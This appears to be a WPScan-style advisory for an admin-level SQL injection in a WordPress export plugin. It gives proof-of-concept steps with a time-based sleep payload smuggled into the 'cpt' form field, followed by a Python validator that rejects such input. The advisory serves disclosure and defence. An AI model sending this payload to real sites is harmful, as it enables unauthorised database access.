wpvulndb | Asif Nawaz Minhas | WPVDB-ID:4267109C-0CA2-441D-889D-FB39C235F128
History: May 20, 2022 - 12:00 a.m.

Export any WordPress data to XML/CSV < 1.3.5 - Admin+ SQL Injection

Published: 2022-05-20 00:00:00
Source: wpscan.com
Tags: wordpress, xml, csv, sql injection, admin, vulnerability, database query

EPSS: 0.001 (Percentile: 37.7%)

The plugin does not sanitize the cpt POST parameter when exporting post data before using it in a database query, leading to an SQL injection vulnerability.

PoC

1. Go to the All Export > New Export screen in the WordPress admin.
2. Click on Specific Post Type > Posts.
3. Click on Migrate Posts, intercept the request and look for the field named cpt:

    Content-Disposition: form-data; name="cpt"

    post

   Change it to:

    Content-Disposition: form-data; name="cpt"

    post'+(select*from(select(sleep(10)))a)+'

The response now arrives about 10 seconds later, confirming the SQL injection vulnerability.
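A request-side check for the cpt field described above, as an added example that is not part of the advisory or the plugin's code. It parses the multipart/form-data body and accepts cpt only if it is a well-formed WordPress post type key (lowercase alphanumerics, dashes and underscores, at most 20 characters) that is also registered; the REGISTERED set, the function names and the sample requests are assumptions constructed for illustration.

```python
import re
from email import message_from_bytes

# WordPress post type keys: lowercase alphanumerics, dashes, underscores, max 20 chars.
POST_TYPE_KEY = re.compile(r"[a-z0-9_-]{1,20}")
# Assumption: the post types registered on the site under review.
REGISTERED = {"post", "page", "attachment"}


def multipart_fields(content_type, body):
    """Return {field name: value} for a multipart/form-data request body."""
    raw = b"Content-Type: " + content_type.encode("ascii") + b"\r\n\r\n" + body
    msg = message_from_bytes(raw)
    fields = {}
    if msg.is_multipart():
        for part in msg.get_payload():
            name = part.get_param("name", header="content-disposition")
            if name is not None:
                fields[name] = part.get_payload()
    return fields


def check_cpt(content_type, body, registered=REGISTERED):
    """Classify the cpt field of an export request."""
    value = multipart_fields(content_type, body).get("cpt")
    if value is None:
        return "absent"
    if not POST_TYPE_KEY.fullmatch(value):
        return "reject: not a valid post type key"
    if value not in registered:
        return "reject: unregistered post type"
    return "ok"


# Constructed sample requests (not captured traffic).
BOUNDARY = "constructedboundary"
CONTENT_TYPE = "multipart/form-data; boundary=" + BOUNDARY


def sample_body(cpt_value):
    """Build a one-field multipart body carrying the given cpt value."""
    return ("--" + BOUNDARY + "\r\n"
            'Content-Disposition: form-data; name="cpt"\r\n\r\n'
            + cpt_value + "\r\n--" + BOUNDARY + "--\r\n").encode("utf-8")


if __name__ == "__main__":
    for value in ("post", "product", "post'+(select*from(select(sleep(10)))a)+'"):
        print(repr(value), "->", check_cpt(CONTENT_TYPE, sample_body(value)))
```

The same allow-list logic applies server-side: a value that passes both checks contains no quote or parenthesis characters, so it cannot alter the query it is placed in.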
